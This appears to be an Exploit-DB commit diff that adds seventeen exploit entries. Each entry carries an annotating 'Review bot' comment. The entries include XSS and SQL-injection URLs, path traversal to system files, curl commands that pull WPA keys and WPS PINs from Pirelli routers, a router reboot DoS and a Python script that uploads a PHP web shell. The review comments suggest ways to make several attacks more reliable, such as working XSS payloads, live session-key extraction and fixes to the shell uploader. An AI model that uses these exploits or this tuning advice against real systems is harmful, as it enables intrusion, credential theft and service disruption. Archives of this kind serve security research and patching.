Update: 2015-01-09

17 new exploits
This commit is contained in:
Offensive Security 2015-01-09 08:35:34 +00:00
parent 9a82f302ee
commit 3210d198cc
20 changed files with 1273 additions and 669 deletions

695
files.csv

File diff suppressed because it is too large

11
platforms/asp/webapps/35728.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/47772/info
Keyfax Customer Response Management is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Keyfax Customer Response Management 3.2.2.6 is vulnerable; other versions may also be affected.
http://www.example.com/keyfax32/test/response.asp?co="style%3d"x:expression(alert(1))""%20";
http://www.example.com/keyfax32/rs/main_rs.asp?C="style%3d"x:expression(alert(1))""%20";
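Review bot: both PoC URLs (the `co` parameter of `test/response.asp` and `C` of `rs/main_rs.asp`) depend on the CSS `expression()` trick inside an injected `style` attribute, which only executes in legacy Internet Explorer, so a tester reproducing this in a current browser will see no alert even though the reflection is there. Record the raw reflection (the closing quote and `style=` landing inside an attribute) as the finding and add a browser-independent variant such as `"><script>alert(1)</script>` or an event-handler attribute next to the `expression()` payload.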


@ -0,0 +1,128 @@
- Title:
CVE-2015-0554 ADB BroadBand Pirelli ADSL2/2+ Wireless Router P.DGA4001N remote information disclosure
HomeStation Movistar
- Author:
Eduardo Novella @enovella_
ednolo[@]inf.upv[dot]es
- Version:
Tested on firmware version PDG_TEF_SP_4.06L.6
- Shodan dork :
+ "Dropbear 0.46 country:es" ( From now on it looks like not working on this way)
- Summary:
HomeStation movistar has deployed routers manufactured by Pirelli. These routers are vulnerable to fetch HTML code from any
IP public over the world. Neither authentication nor any protection to avoid unauthorized extraction of sensitive information.
- The vulnerability and the way to exploit it:
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "WLAN_"
<option value='0'>WLAN_DEAD</option>
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var wpapskkey"
var wpaPskKey = 'IsAklFHhFFui1sr9ZMqD';
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var WscDevPin"
var WscDevPin = '12820078';
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var sessionkey"
var sessionKey='1189641421';
$ curl -s http://${IP_ADDRESS}/wlcfg.html | grep -i "bssid:" -A 3
<td width="50">BSSID:</td>
<td>
DC:0B:1A:XX:XX:XX
</td>
# Rebooting the router remotely and provoking a Denial of Service
#-----------------------------------------------------------------
http://${IP_ADDRESS}/resetrouter.html
We can observe at the source:
<!-- hide
var sessionKey='846930886';
function btnReset() {
var loc = 'rebootinfo.cgi?';
loc += 'sessionKey=' + sessionKey;
var code = 'location="' + loc + '"';
eval(code);
}
// done hiding -->
http://${IP_ADDRESS}/rebootinfo.cgi?sessionKey=233665123
# All the information what we can fetch from.
#----------------------------------------------
webs$ ls
adslcfgadv.html diagpppoe.html ipv6lancfg.html qoscls.html statsatmreset.html
adslcfgc.html dlnacfg.html js qosqmgmt.html statsifc.html
adslcfg.html dnscfg.html jsps qosqueueadd.html statsifcreset.html
adslcfgtone.html dnsproxycfg.html lancfg2.html qsmain.html statsmocalanreset.html
algcfg.html dsladderr.html languages quicksetuperr.html statsmocareset.html
APIS dslbondingcfg.html lockerror.html quicksetup.html statsmocawanreset.html
atmdelerr.html enblbridge.html logconfig.html quicksetuptesterr.html statsvdsl.html
backupsettings.html enblservice.html logintro.html quicksetuptestsucc.html statsvdslreset.html
berrun.html engdebug.html logobkg.gif rebootinfo.html statswanreset.html
berstart.html ethadderr.html logoc.gif resetrouter.html statsxtmreset.html
berstop.html ethdelerr.html logo_corp.gif restoreinfo.html storageusraccadd.html
certadd.html footer.html logo.html routeadd.html stylemain.css
certcaimport.html hlpadslsync.html logomenu.gif rtdefaultcfgerr.html threeGPIN.html
certimport.html hlpatmetoe.html main.html rtdefaultcfg.html todadd.html
certloadsigned.html hlpatmseg.html menuBcm.js scdmz.html tr69cfg.html
cfgatm.html hlpethconn.html menu.html scinflt.html updatesettings.html
cfgeth.html hlppngdns.html menuTitle.js scmacflt.html upload.html
cfgl2tpac.html hlppnggw.html menuTree.js scmacpolicy.html uploadinfo.html
cfgmoca.html hlppppoasess.html mocacfg.html scoutflt.html upnpcfg.html
cfgptm.html hlppppoeauth.html multicast.html scprttrg.html url_add.html
colors.css hlppppoeconn.html natcfg2.html scripts util.js
config.json.txt hlppppoeip.html ntwksum2.html scvrtsrv.html wanadderr.html
css hlptstdns.html omcidownload.html seclogintro.html wancfg.html
ddnsadd.html hlpusbconn.html omcisystem.html snmpconfig.html wlcfgadv.html
defaultsettings.html hlpwlconn.html password.html sntpcfg.html wlcfg.html
dhcpinfo.html html portmapadd.html standby.html wlcfgkey.html
diag8021ag.html ifcdns.html portmapedit.html StaticIpAdd.html wlmacflt.html
diagbr.html ifcgateway.html portName.js StaticIpErr.html wlrefresh.html
diag.html images pppoe.html statsadslerr.html wlsecurity.html
diagipow.html index.html pradd.html statsadsl.html wlsetup.html
diaglan.html info.html ptmadderr.html statsadslreset.html wlwapias.html
diagmer.html ipoacfg.html ptmdelerr.html statsatmerr.html xdslcfg.html
diagpppoa.html ippcfg.html pwrmngt.html statsatm.html
+ Conclusion:
This vulnerability can be exploited remotely and it should be patched as soon as possible. An attacker could be monitoring our network
or even worse being a member of a botnet without knowledge of it.
First mitigation could be either try to update the last version for these routers or install 3rd parties firmwares as OpenWRT or DDWRT on them.
+ References:
http://packetstormsecurity.com/files/115663/Alpha-Networks-ADSL2-2-Wireless-Router-ASL-26555-Password-Disclosure.html
+ Timeline:
2013-04-xx Send email to Movistar and Pirelli
2015-01-05 Full disclosure
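Review bot: the reboot URL `http://${IP_ADDRESS}/rebootinfo.cgi?sessionKey=233665123` uses a key that matches neither the `var sessionKey='1189641421';` pulled from wlsecurity.html nor the `var sessionKey='846930886';` shown for resetrouter.html, and the three different values show the key is generated per page load; the steps should say to fetch resetrouter.html, extract the current `sessionKey` from its source and call rebootinfo.cgi with that value, otherwise readers will copy the literal key and report the DoS as not reproducing. Two smaller points: the `wlsecurity.html` greps already return the WPA PSK (`wpaPskKey`) and WPS PIN (`WscDevPin`) to a bare `curl` with no cookie or Authorization header, so the summary can state plainly that these CGI pages are served without authentication rather than "neither authentication nor any protection"; and the Shodan dork line says it "looks like not working", so it should either be dropped or replaced by a banner that still matches.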

19
platforms/multiple/dos/35725.pl Executable file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/47766/info
Perl is prone to multiple denial-of-service vulnerabilities caused by a NULL-pointer dereference.
An attacker can exploit these issues to cause an affected application to crash, denying service to legitimate users.
Perl versions 5.10.x are vulnerable.
jonathan () blackbox:~/test$ cat poc1.pl
#!/usr/bin/perl
$a =
getsockname(9505,4590,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA",17792);
jonathan () blackbox:~/test$ perl poc1.pl
Segmentation fault (core dumped)
jonathan () blackbox:~/test$
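Review bot: 35725.pl is stored as a `.pl` file but the four SecurityFocus description lines and the `jonathan () blackbox:~/test$` transcript lines are bare text, so `perl 35725.pl` dies with syntax errors before the `getsockname` call is ever reached; either prefix those lines with `#` or keep only the `#!/usr/bin/perl` / `$a = getsockname(...)` body and move the transcript into a comment. The `"AAAA..."` argument is also wrapped across four lines inside the double quotes, which makes the string contain newlines and changes its length compared with a single-line literal; say which form was tested so nobody "tidies" it and alters the PoC.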


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/47780/info
Imperva SecureSphere is prone to a security-bypass vulnerability.
An attacker can leverage this vulnerability to bypass certain security restrictions. Successful exploits may allow attackers to exploit SQL-injection vulnerabilities.
15 and '1'=(SELECT '1' FROM dual) and '0having'='0having'
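Review bot: the single line `15 and '1'=(SELECT '1' FROM dual) and '0having'='0having'` is given without the request it belongs in, so the entry does not say which parameter behind SecureSphere was injected, what the blocked baseline payload looked like, or why the `'0having'='0having'` tautology and the `(SELECT '1' FROM dual)` subquery get past the signature. Add the HTTP request, the payload that is blocked and the variant that passes, so the bypass can be re-tested against a current signature set.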


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47751/info
FestOS is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process.
FestOS 2.3c is vulnerable; other versions may also be affected.
http://www.example.com/[path]/admin/includes/tiny_mce/plugins/tinybrowser/upload.php
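Review bot: the PoC is only the path `admin/includes/tiny_mce/plugins/tinybrowser/upload.php`; nothing in the entry shows the multipart field name, whether a `.php` file is accepted as-is or only after renaming, or whether the `admin/` prefix means an authenticated session is required, so the "upload arbitrary code and run it in the context of the webserver" claim cannot be checked from what is here. Add the upload request and the URL of the resulting file.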


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47755/info
encoder is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
encoder 0.4.10 is vulnerable; other versions may also be affected.
http://www.example.com/ecoder-0.4.10/edit.php?editor=&mode=%22%3E%3Cscript%3Ealert(0)%3C/script%3E&path=%22%3E%3Cscript%3Ealert(0)%3C/script%3E&file=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
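Review bot: the three description lines call the product "encoder" while the PoC path is `/ecoder-0.4.10/edit.php`; the URL is the one that carries the version string, so the description should read "ecoder" to keep the entry from being filed under the wrong product. The PoC also injects the same payload into `mode`, `path` and `file` in one request, which does not tell the reader which of the three is reflected; test them one at a time and list the vulnerable ones.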


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47756/info
Ampache is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Ampache 3.5.4 is vulnerable; other versions may also be affected.
<html> <body onload="document.forms[0].submit()"> <form method="POST" action="http://localhost/ampache-3.5.4/login.php"> <input type="hidden" name="username" value=""><script>alert(0)</script>" /> </form> </body> </html>
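Review bot: the hidden input `value=""><script>alert(0)</script>" />` does not do what it intends: the first `"` after `value=` closes an empty attribute, the following `>` closes the input tag, and `<script>alert(0)</script>` then runs in the attacker's own page, so the form posts an empty `username` and the target's login.php is never exercised. Write the attribute as `value="&quot;&gt;&lt;script&gt;alert(0)&lt;/script&gt;"` (the browser decodes the entities before submitting) or set the field from JavaScript. It would also help to state that `username` is reflected on a failed login, since a POST-only reflection is only reachable through this kind of auto-submitting page.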


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47757/info
Exponent CMS is prone to a local file-include vulnerability and an arbitrary-file-upload vulnerability.
An attacker can exploit these issues to upload arbitrary files onto the webserver, execute arbitrary local files within the context of the webserver, and obtain sensitive information.
Exponent CMS 2.0.0 beta 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/exponent/content_selector.php?controller=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00&section=&action=
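Review bot: the `controller=..%2f...%2fwindows%2fwin.ini%00` payload relies on the trailing `%00` to cut off whatever suffix `content_selector.php` appends to the parameter, and that null-byte truncation only works on PHP releases before 5.3.4; say so, or the entry will be reported as non-reproducing on patched installs. The description also lists both a local file include and an arbitrary file upload, but only the include has a PoC; add the upload request or drop the upload claim from the description.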


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47758/info
Gelsheet is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Gelsheet 1.02 is vulnerable; other versions may also be affected.
http://www.example.com/fengoffice/public/assets/javascript/gelSheet/index.php?id=%3Cscript%3Ealert%280%29%3C/script%3E&wid=%3Cscript%3Ealert%280%29%3C/script%3E&book=%3Cscript%3Ealert%280%29%3C/script%3E
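Review bot: the PoC URL is `/fengoffice/public/assets/javascript/gelSheet/index.php` while the description names "Gelsheet 1.02", so the entry should say that this is the gelSheet component shipped inside Feng Office (and which Feng Office version was tested), or readers searching by the CMS name will miss it. As with the other multi-parameter XSS entries in this commit, `id`, `wid` and `book` are all injected in one request, so it is unclear which of them reflect.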

116
platforms/php/webapps/35719.py Executable file

@ -0,0 +1,116 @@
source: http://www.securityfocus.com/bid/47759/info
phpWebSite is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
phpWebSite 1.7.1 is vulnerable; other versions may also be affected.
# ------------------------------------------------------------------------
# Software................phpWebSite 1.7.1
# Vulnerability...........Arbitrary Upload
# Threat Level............Very Critical (5/5)
# Download................http://phpwebsite.appstate.edu/
# Discovery Date..........5/5/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <john@autosectools.com>
# ------------------------------------------------------------------------
#
#
# --Description--
#
# An arbitrary upload vulnerability in phpWebSite 1.7.1 can be exploited
# to upload a PHP shell.
#
#
# --PoC--
import socket
host = 'localhost'
path = '/phpwebsite_1_7_1'
shell_path = path + '/javascript/editors/fckeditor/editor/filemanager/upload/phpws/.shell'
port = 80
def upload_shell():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
s.send('POST ' + path + '/javascript/editors/fckeditor/editor/filemanager/upload/phpws/upload.php?local=.htaccess HTTP/1.1\r\n'
'Host: localhost\r\n'
'Proxy-Connection: keep-alive\r\n'
'User-Agent: x\r\n'
'Content-Length: 223\r\n'
'Cache-Control: max-age=0\r\n'
'Origin: null\r\n'
'Content-Type: multipart/form-data; boundary=----x\r\n'
'Accept: text/html\r\n'
'Accept-Encoding: gzip,deflate,sdch\r\n'
'Accept-Language: en-US,en;q=0.8\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
'\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="NewFile"; filename=".htaccess"\r\n'
'Content-Type: application/octet-stream\r\n'
'\r\n'
'AddType application/x-httpd-php .shell\r\n'
'\r\n'
'Action application/x-httpd-php "/php/php.exe"\r\n'
'------x--\r\n'
'\r\n')
resp = s.recv(8192)
http_ok = 'HTTP/1.1 200 OK'
if http_ok not in resp[:len(http_ok)]:
print 'error uploading .htaccess'
return
else: print '.htaccess uploaded'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
s.send('POST ' + path + '/javascript/editors/fckeditor/editor/filemanager/upload/phpws/upload.php?local=.htaccess HTTP/1.1\r\n'
'Host: localhost\r\n'
'Proxy-Connection: keep-alive\r\n'
'User-Agent: x\r\n'
'Content-Length: 163\r\n'
'Cache-Control: max-age=0\r\n'
'Origin: null\r\n'
'Content-Type: multipart/form-data; boundary=----x\r\n'
'Accept: text/html\r\n'
'Accept-Encoding: gzip,deflate,sdch\r\n'
'Accept-Language: en-US,en;q=0.8\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
'\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="NewFile"; filename=".shell"\r\n'
'Content-Type: application/octet-stream\r\n'
'\r\n'
'<?php system($_GET["CMD"]); ?>\r\n'
'------x--\r\n'
'\r\n')
resp = s.recv(8192)
http_ok = 'HTTP/1.1 200 OK'
if http_ok not in resp[:len(http_ok)]:
print 'error uploading shell'
return
else: print 'shell uploaded'
s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
'Host: ' + host + '\r\n\r\n')
print 'shell located at http://' + host + shell_path
upload_shell()
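Review bot: `upload_shell()` hard-codes `Content-Length: 223` and `Content-Length: 163` and `Host: localhost` inside the raw request strings, so changing `host`, `path` or the `.htaccess`/shell body silently breaks the requests (the server waits for, or cuts off, a body of the wrong size). Build each multipart body as a separate string and send `'Content-Length: ' + str(len(body))` and `'Host: ' + host` instead. Two more points: the `.htaccess` line `Action application/x-httpd-php "/php/php.exe"` is specific to the Windows/XAMPP layout named in the header and must be removed on a Linux target, and the closing `s.send('GET ' + shell_path ...)` never reads the response, so the script prints "shell located at" without having confirmed that the server actually executes `.shell` files; read the reply and check for a 200 before claiming success.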

29
platforms/php/webapps/35720.txt Executable file

@ -0,0 +1,29 @@
# Exploit Title: SQL Injection in Microweber CMS 0.95
# Google Dork: N/A
# Date: 12/16/2014
# Exploit Author: Pham Kien Cuong (cuong.k.pham@itas.vn) and ITAS Team (www.itas.vn)
# Vendor Homepage: Microweber (https://microweber.com/)
# Software Link: https://github.com/microweber/microweber
# Version: 0.95
# Tested on: N/A
# CVE : CVE-2014-9464
::PROOF OF CONCEPT::
GET /shop/category:[SQL INJECTION HERE] HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target/shop
Cookie: mw-time546209978=2015-01-05+05%3A19%3A53; PHPSESSID=48500cad98b9fa857b9d82216afe0275
Connection: keep-alive
::REFERENCE::
- http://www.itas.vn/news/itas-team-found-out-a-sql-injection-vulnerability-in-microweber-cms-69.html
- https://www.youtube.com/watch?v=SSE8Xj_-QaQ
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9464
::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.
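Review bot: the PoC request is `GET /shop/category:[SQL INJECTION HERE]` with no concrete payload, so the entry never shows whether the category segment is a numeric or quoted context, which response difference confirms the injection, or which DBMS is behind it; one boolean pair or a time-based payload with the observed effect would make the entry reproducible. The request also carries the tester's `PHPSESSID=48500cad...` and `mw-time` cookies; say whether a session is required or remove the `Cookie:` line so nobody assumes it is.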

72
platforms/php/webapps/35722.txt Executable file

@ -0,0 +1,72 @@
Advisory: SQL-Injection in administrative Backend of Sefrengo CMS v.1.6.0
Advisory ID: SROEADV-2015-04
Author: Steffen Rösemann
Affected Software: CMS Sefrengo v.1.6.0 (Release-Date: 18th-Feb-2014)
Vendor URL: http://www.sefrengo.org/start/start.html
Vendor Status: fixed
CVE-ID: -
==========================
Vulnerability Description:
==========================
The Content Management System Sefrengo v.1.6.0 contains SQL-Injection
vulnerabilities in its administrative Backend.
==================
Technical Details:
==================
The administrative Backend of Sefrengo CMS contains a functionality to edit
folders which reside on the CMS. Its located here:
http://{TARGET}/backend/main.php?area=con_configcat&idcat=1&idtplconf=0
The parameter „idcat“ ist vulnerable against SQL-Injection. An attacker
could abuse this to send crafted URLs to the administrator via mail to
execute own SQL commands (e.g. create a second admin-account).
Exploit-Example:
http://
{TARGET}/backend/main.php?area=con_configcat&idcat=1'+and+'1'='2'+union+select+version(),user(),3,4+--+&idtplconf=0
Another SQL-Injection vulnerability can be found in the administrative
backend, where the admin can manage installed plugins. The vulnerable
parameter is „idclient“ in the following URL:
http://{TARGET}/backend/main.php?area=plug&idclient=1
Exploit-Example:
http://
{TARGET}/backend/main.php?area=plug&idclient=1%27+and+%271%27=%272%27+union+select+1,version%28%29,user%28%29,4,database%28%29,6,7,8,9,10,11,12,13,14+--+
=========
Solution:
=========
Update to the latest version
====================
Disclosure Timeline:
====================
21-Dec-2014 found the vulnerability
21-Dec-2014 - informed the developers
22-Dec-2014 - response by vendor
04-Jan-2015 fix by vendor
04-Jan-2015 - release date of this security advisory
04-Jan-2015 - post on BugTraq / FullDisclosure
========
Credits:
========
Vulnerability found and advisory written by Steffen Rösemann.
===========
References:
===========
http://www.sefrengo.org/start/start.html
http://sroesemann.blogspot.de
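Review bot: both injection points (`idcat` under `area=con_configcat` and `idclient` under `area=plug`) live in `backend/main.php`, so exploitation needs an authenticated administrator to open the crafted link, as the "send crafted URLs to the administrator via mail" sentence implies; the "Solution: Update to the latest version" line should name the fixed release, because "Vendor Status: fixed" on 04-Jan-2015 does not tell a reader which version after 1.6.0 closes the hole. The two Exploit-Example URLs are also split over two lines (`http://` followed by `{TARGET}/backend/...`) and will be copied broken; keep each URL on one line.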


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47762/info
TCExam is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
TCExam 11.1.029 is vulnerable; other versions may also be affected.
http://www.example.com/tcexam/admin/code/tce_xml_user_results.php?lang=&user_id=1&startdate=[SQL]&enddate=[SQL]&order_field=[SQL]
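Review bot: the PoC `admin/code/tce_xml_user_results.php` has `[SQL]` placeholders in `startdate`, `enddate` and `order_field` and no sample payload; it should state that an admin session is needed (the path is the admin interface) and give one working value per parameter, since `order_field` is, from its name, presumably used in an ORDER BY position where a quote-based payload does not apply and the confirmation method differs from the two date parameters.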


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47763/info
EmbryoCore is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
EmbryoCore 1.03 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/index.php?page=[-!Blind SQLi Here!-]
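Review bot: `index.php?page=[-!Blind SQLi Here!-]` gives neither a payload nor an oracle (which response difference or delay confirms the blind injection), so the entry is not reproducible as written; add one true/false pair or a time-based payload together with the observed effect.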

58
platforms/php/webapps/35726.py Executable file

@ -0,0 +1,58 @@
source: http://www.securityfocus.com/bid/47767/info
GetSimple is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
GetSimple 3.0 is vulnerable; other versions may also be affected.
# ------------------------------------------------------------------------
# Software................GetSimple 3.0
# Vulnerability...........Local File Inclusion
# Threat Level............Critical (4/5)
# Download................http://get-simple.info/
# Discovery Date..........5/4/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <john@autosectools.com>
# ------------------------------------------------------------------------
#
#
# --Description--
#
# A local file inclusion vulnerability in GetSimple 3.0 can be exploited
# to include arbitrary files.
#
#
# --PoC--
import socket
host = 'localhost'
path = '/getsimple_3.0'
trav_sequence = '..%2f' * 8 + 'windows%2fwin.ini'
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
s.send('POST ' + path + '/index.php?set=' + trav_sequence + ' HTTP/1.1\r\n'
'Host: localhost\r\n'
'Proxy-Connection: keep-alive\r\n'
'User-Agent: x\r\n'
'Content-Length: 0\r\n'
'Cache-Control: max-age=0\r\n'
'Origin: null\r\n'
'Content-Type: multipart/form-data; boundary=----x\r\n'
'Accept: text/html\r\n'
'Accept-Language: en-US,en;q=0.8\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
'\r\n')
resp = s.recv(8192)
print resp
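Review bot: the request sends `POST ... Content-Type: multipart/form-data; boundary=----x` with `Content-Length: 0` and no body, which serves no purpose: the traversal travels in the `set` query parameter, so a plain `GET` without the multipart headers is the honest reproduction. As in 35719.py, `Host: localhost` is hard-coded while `host` is a variable, so the two should be tied together, and the `windows%2fwin.ini` target only applies to the Windows/XAMPP setup in the header; on a Unix host substitute `etc%2fpasswd`. Finally the script just prints the raw response; checking for a known string from the target file would make success unambiguous.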


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/47770/info
HOMEPIMA Design is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
http://www.example.com/setup/filedown.php?file=../../../../../../../../../../../../../../etc/passwd
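Review bot: no affected version is recorded, unlike the other SecurityFocus-derived entries in this commit; the `setup/filedown.php?file=../../.../etc/passwd` PoC also does not say whether the `setup/` directory remains reachable after installation or only while the installer is present, which decides how widespread the exposure is. Add both.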


@ -1,179 +1,179 @@
/* /*
Proof of concept exploit for ZDI - Citrix Metaframe spooler service vulnerability Proof of concept exploit for ZDI - Citrix Metaframe spooler service vulnerability
Microsoft Windows - EnumPrinter() & EnumPrinterW() Fuzzer v0.1 Microsoft Windows - EnumPrinter() & EnumPrinterW() Fuzzer v0.1
Author: Andres Tarasco Acuña - atarasco@514.es Author: Andres Tarasco Acuña - atarasco@514.es
url: http://www.514.es url: http://www.514.es
This is an intial version of EnumPrinter() and OpenPrinter() fuzzer. I hope that This is an intial version of EnumPrinter() and OpenPrinter() fuzzer. I hope that
it will help to identify similar vulnerabilities. it will help to identify similar vulnerabilities.
Tested against win2k3 + Citrix presentation server. If the system is vulnerable Tested against win2k3 + Citrix presentation server. If the system is vulnerable
this application will kill spooler service (spoolsv.exe ) and ret will be overwritten this application will kill spooler service (spoolsv.exe ) and ret will be overwritten
with 0x00410041 with 0x00410041
514 Tiger Team ownz u 514 Tiger Team ownz u
*/ */
#include <stdio.h> #include <stdio.h>
#include <windows.h> #include <windows.h>
#include <Winspool.h> #include <Winspool.h>
#pragma comment(lib,"Winspool.lib") #pragma comment(lib,"Winspool.lib")
void usage(char *name) { void usage(char *name) {
printf("Usage: %s -a (Ascii fuzzing for local printer providers)\n",name); printf("Usage: %s -a (Ascii fuzzing for local printer providers)\n",name);
printf("Usage: %s -u (Unicode fuzzing for local printer providers)\n",name); printf("Usage: %s -u (Unicode fuzzing for local printer providers)\n",name);
exit(0); exit(0);
} }
#define RECURSIVE 1 #define RECURSIVE 1
#define OPT_UNICODE 2 #define OPT_UNICODE 2
#define MAX_PRINTER_LEN 4096 #define MAX_PRINTER_LEN 4096
#define _DBG_ #define _DBG_
#undef _DBG_ #undef _DBG_
int CustomFuzzSize[]= {25,50,100,150,250,300,500,1000,1500, 2000}; int CustomFuzzSize[]= {25,50,100,150,250,300,500,1000,1500, 2000};
wchar_t dst[MAX_PRINTER_LEN]; wchar_t dst[MAX_PRINTER_LEN];
void Fuzzer( wchar_t *orig,int opt, int unicode) { void Fuzzer( wchar_t *orig,int opt, int unicode) {
int i,j; int i,j;
int len; int len;
if (unicode) len=wcslen(orig); if (unicode) len=wcslen(orig);
else len=strlen((char *)orig); else len=strlen((char *)orig);
memset((char *)dst,'\0',sizeof(dst)); memset((char *)dst,'\0',sizeof(dst));
memcpy((char *)dst,orig,len*(1+unicode)); memcpy((char *)dst,orig,len*(1+unicode));
j=wcslen(orig); j=wcslen(orig);
for(i=0;i<CustomFuzzSize[opt];i++) { for(i=0;i<CustomFuzzSize[opt];i++) {
if (unicode) dst[j+i]='A'; if (unicode) dst[j+i]='A';
else ((char *)dst)[j+i]=(char)'A'; else ((char *)dst)[j+i]=(char)'A';
} }
if (opt==0) { if (opt==0) {
if (unicode) if (unicode)
printf("Fuzzing: %S ( %i -%i)\n",dst,CustomFuzzSize[0],CustomFuzzSize[sizeof(CustomFuzzSize)/sizeof(int)-1]); printf("Fuzzing: %S ( %i -%i)\n",dst,CustomFuzzSize[0],CustomFuzzSize[sizeof(CustomFuzzSize)/sizeof(int)-1]);
else printf("Fuzzing: %s ( %i -%i)\n",dst,CustomFuzzSize[0],CustomFuzzSize[sizeof(CustomFuzzSize)/sizeof(int)-1]); else printf("Fuzzing: %s ( %i -%i)\n",dst,CustomFuzzSize[0],CustomFuzzSize[sizeof(CustomFuzzSize)/sizeof(int)-1]);
} }
} }
DWORD ShowPrinterInfo(wchar_t *lpName, int level, int opt, char *padding) { DWORD ShowPrinterInfo(wchar_t *lpName, int level, int opt, char *padding) {
unsigned char *lpInfo; unsigned char *lpInfo;
int i,j; int i,j;
DWORD n; DWORD n;
DWORD dwSizeNeeded=0; DWORD dwSizeNeeded=0;
char newpadding[50]; char newpadding[50];
DWORD ret; DWORD ret;
if (opt & OPT_UNICODE) { if (opt & OPT_UNICODE) {
EnumPrintersW ( PRINTER_ENUM_NAME, (wchar_t* )lpName, level, NULL, 0, &dwSizeNeeded, &n ); EnumPrintersW ( PRINTER_ENUM_NAME, (wchar_t* )lpName, level, NULL, 0, &dwSizeNeeded, &n );
} else { } else {
